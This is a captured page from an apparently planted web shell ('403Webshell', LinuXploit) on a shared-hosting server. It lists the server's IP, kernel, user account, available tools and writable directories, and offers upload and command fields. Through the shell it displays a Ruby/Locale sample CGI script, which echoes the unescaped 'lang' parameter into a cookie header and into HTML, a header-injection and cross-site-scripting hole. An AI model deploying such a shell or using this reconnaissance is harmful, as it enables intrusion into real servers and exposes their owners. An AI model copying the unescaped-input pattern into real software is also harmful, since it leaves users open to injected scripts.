403Webshell
Server IP : 66.29.132.122  /  Your IP : 13.59.79.176
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/puppetlabs/puppet/lib/ruby/vendor_gems/gems/locale-2.1.4/samples/cgi/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/puppetlabs/puppet/lib/ruby/vendor_gems/gems/locale-2.1.4/samples/cgi/cookie.cgi
#!/usr/bin/env ruby
=begin
  cookie.cgi - Set a selected locale to the cookie of WWW Browser.

  Set UTF-8 forcely as output charset.

  Recommanded to set UTF-8 forcely because some web browser
  doesn't send HTTP_ACCEPT_CHARSET correctly.

  Copyright (C) 2008  Masao Mutoh

  You may redistribute it and/or modify it under the same
  license terms as Ruby.
=end

$:<< "../../lib"

require 'locale'
require 'cgi'

# Initialization of Locale library.
Locale.init(:driver => :cgi)
cgi = CGI.new
Locale.set_cgi(cgi)

# Get "lang" from the query string.
lang = cgi["lang"] or ""

#
# CGI part
#
print "Set-Cookie:lang=#{lang}\n"
print "Content-type:text/html; charset=UTF-8\n\n"

puts %Q[
<html>
<head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <link rel="stylesheet" type="text/css" href="locale.css" media="all">
  <title>Sample script for CGI and Ruby/Locale</title>
</head>
<body>

<div style="text-align:center; margin:5em;">
]

if lang.size > 0
  puts %Q!<p><div id="result">Set [#{lang}] as the cookie of your WWW browser.</div></p>!
else
  puts %Q!<p><div id="result">Clear "lang" value from your WWW browser.</div></p>!
end

puts %Q!
<p style="margin:2em;"><a href="/">Back</a></p>
</div>
<div style="text-align:right">
  <p>Copyright (C) 2008 Masao Mutoh</p>
</div>
</body>
</html>
!


Youez - 2016 - github.com/yon3zu
LinuXploit